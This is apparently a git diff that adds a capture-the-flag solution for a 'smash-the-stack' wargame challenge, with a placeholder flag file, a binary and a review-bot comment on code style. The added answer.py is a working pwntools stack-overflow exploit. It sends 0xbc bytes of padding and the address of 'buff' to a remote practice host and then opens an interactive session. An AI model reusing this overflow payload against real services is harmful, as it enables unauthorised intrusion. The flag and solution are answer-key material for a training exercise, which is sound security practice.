diff --git a/canary/smash-the-stack/answer.py b/canary/smash-the-stack/answer.py
new file mode 100644
index 0000000..36eb079
--- /dev/null
+++ b/canary/smash-the-stack/answer.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = remote("hackme.inndy.tw", 7717)
+#p = process('./smash-the-stack')
+elf = ELF('./smash-the-stack')
+
+buff_bss = elf.sym['buff']
+
+payload = 0xbc*'a' + p32(buff_bss)
+p.sendline(payload)
+
+p.interactive()
diff --git a/canary/smash-the-stack/flag b/canary/smash-the-stack/flag
new file mode 100644
index 0000000..f4e4fb8
--- /dev/null
+++ b/canary/smash-the-stack/flag
@@ -0,0 +1 @@
+flag{this-is-a-test-flag-this-is-a-test-flag}
diff --git a/canary/smash-the-stack/smash-the-stack b/canary/smash-the-stack/smash-the-stack
new file mode 100755
index 0000000..7f5d780
Binary files /dev/null and b/canary/smash-the-stack/smash-the-stack differ
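Review bot: In answer.py, `from LibcSearcher import *`, `from struct import pack` and `import os` are never used. The two values the script depends on, the `0xbc` pad length and the `buff` symbol, have no comment saying where they come from. I would drop the three imports and add a short comment above the payload line recording what the `0xbc` bytes of padding reach and why the address of `buff` is written after them; the binary is not visible here, so the author has to supply that wording. The concatenation `0xbc*'a' + p32(buff_bss)` only works under the python2 shebang, whereas `b'a' * 0xbc + p32(buff_bss)` runs on both interpreters.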